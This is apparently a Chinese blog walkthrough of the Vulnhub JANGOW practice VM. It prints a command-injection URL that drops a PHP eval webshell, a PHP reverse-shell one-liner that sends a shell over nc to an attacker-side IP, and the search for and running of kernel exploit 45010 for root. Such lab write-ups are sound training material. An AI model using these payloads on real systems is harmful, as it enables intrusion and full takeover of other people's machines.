首页 > 其他分享 >VulnhubJANGOW靶机详解

VulnhubJANGOW靶机详解

时间:2024-08-05 19:56:12浏览次数:16  
标签:shell VulnhubJANGOW 192.168 网卡 详解 47.142 靶机 php

项目地址

https://www.vulnhub.com/entry/jangow-101754/

部分vmware有配置问题,需要修改网卡信息,重启dhcp服务

1.在系统启动时(长按shift键)直到显示以下界面

image.png
选择第二个,按回车
image.png
继续选择第二个

2.按e进入编辑,进入以下界面

image.png
删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"
image.png

3.Ctrl+x 启动进入如下界面

修改网卡,重启dhcp服务
编辑文件sudo vim /etc/network/interfaces (将网卡信息设置为自己的网卡,重启电脑即可生效。)
image.png

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

image.png

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

image.png

根据对比可知JANGOW的一个ip地址为192.168.47.142
该靶机开启了21端口和80端口

访问页面

http://192.168.47.142

image.png

点击site/发生了网页跳转

image.png
随便翻翻

当点击buscar时,出现一个空白界面

image.png
image.png

发现url有缺失,输入指令看看

image.png
发现执行成功了

上传一句话木马

192.168.47.142/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > 1.php

image.png
没有报错

尝试蚁剑连接

http://192.168.47.142/site/1.php

image.png
连接成功
image.png
四处翻找后,没有发现有价值的文件

用蚁剑反弹shell

创建一个shell.php文件,写入一句话木马

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.47.129 443 >/tmp/f");?>

image.png

在kali开启端口监听
nc -lvvp 443

image.png

在网站访问shell.php文件
http://192.168.47.142/site/shell.php

image.png
反弹成功

提权

获得交互式shell
python3 -c "import pty; pty.spawn('/bin/bash')"

image.png

查看系统内核版本

image.png

寻找可利用的exp
searchsploit ubuntu 4.4.0-31

image.png

将45010.c下载到本地

image.png

在本地进行编译

image.png

本地开启临时服务,让靶机下载exp文件

image.png
image.png
发现连接失败

拿蚁剑进行上传

image.png
上传成功

将exp文件转移到tmp目录下并运行

image.png
image.png
5c4f4f5ef1c970c7729aa4bebf1ea03.png

进入root模式,查看flag

70f6a105c84967ae27a72ff957e705f.png

标签:shell,VulnhubJANGOW,192.168,网卡,详解,47.142,靶机,php
From: https://blog.csdn.net/weixin_62457642/article/details/140935553

相关文章

  • linux运维一天一个shell命令之vim详解
    前言:在日常运维工作中,掌握好Vim的使用可以极大地提高工作的效率。Vim作为一个强大的文本编辑器,广泛应用于各种运维场景一、定义Vim是一个非常强大的文本编辑器,在Unix/Linux环境中非常流行。它具有许多高级功能和快捷键,适合编写代码、编辑配置文件等。1、特点:高级......
  • iOS订阅详解
    1.进入管理后台点击订阅、然后新建一个组2.然后往组里面添加数据、可以编辑组里面订阅服务的等级、1代表最高等级、拖动可以改变相应的等级、无法自己指定等级、系统会根据拖动自动生成等级升级用户切换为更高等级的订阅。用户需先支付更高等级的订阅费用,支付成功后,订......
  • 公网域名流量禁用详解
    公网域名流量禁用是一个涉及网络安全和流量管理的复杂操作,它通常需要根据具体的网络环境和业务需求来实施。以下是一些可能的步骤和考虑因素:一、明确禁用目标首先,需要明确禁用公网域名流量的具体目标。这可能包括:阻止未经授权的访问。防止恶意流量攻击,如DDoS攻击。节约带宽......
  • Tomcat与Nginx的区别详解
    目录引言Tomcat概述Tomcat的历史Tomcat的架构Tomcat的功能Nginx概述Nginx的历史Nginx的架构Nginx的功能Tomcat与Nginx的区别架构上的区别......
  • 【Python&GIS】Arcpy中常用出图函数详解
        出图是每个GISer都要经历的事,但有时候会有许多重复且多且无聊的出图任务,这个时候我们肯定想能不能自动化出图。ArcGIS中的模型创建就可以实现,但是我的数据大部分是在Python中处理的,所以就想能不能使用Python进行批量出图,正好今天跟大家分享一下。这里使用的mxd作为......
  • Modbus RTU与Modbus TCP协议区别详解
    工业自动化领域中,设备之间的数据传输至关重要,而Modbus协议作为一种通信标准,被广泛应用于各类自动化系统。而Modbus协议有两种常见的变体:ModbusRTU和ModbusTCP,下面本文将详细探讨这两种协议的区别。物理层ModbusRTU采用串行通信方式,利用RS-232或RS-485接口进行数据传输。它......
  • DC-1靶机
    靶机下载下载后直接用vmware打开即可然后把靶机网络连接模式改为net,然后把攻击机也就是kail改为桥连或是net然后打开靶机停留在下面这个状态接下来你就可以开始渗透了第一步:找到靶机先扫一下网段(网段ifconfig看一下)nmap-sV10.204.11.0/24找到应该10.204.11.0是靶......
  • torch.nn.Linear的维度变换过程详解(有图有公式有代码)
    当初在学习nn.Linear时了解到的博客都是关于一维变换的,比如输入3通道,输出6通道;又比如得到(3,4,4)的特征图,需要进行拉平为(48,)的向量,然后通过nn.Linear(48,10)得到10个输出(分类任务很常见)。nn.Linear除了可以进行分类,主要的作用就是改变维度便于下一个卷积层或线形层的输入。但是在实......
  • Java RMI技术详解与案例分析
    JavaRMI(RemoteMethodInvocation)是一种允许Java虚拟机之间进行通信和交互的技术。它使得远程Java对象能够像本地对象一样被访问和操作,从而简化了分布式应用程序的开发。一些应用依然会使用RMI来实现通信和交互,今天的内容我们来聊聊RMI的那些事儿。一、先来了解一下概念RMI......
  • Android开发 - Movie 类详解
    基本结构Movie类应该包含电影的基本信息。假设我们需要存储以下信息:电影标题(title)电影描述(description)发布年份(releaseYear)评分(rating)海报URL(posterUrl)我们将为这些属性创建一个类!创建Movie类首先定义Movie类并添加相应的属性、构造方法和getter/set......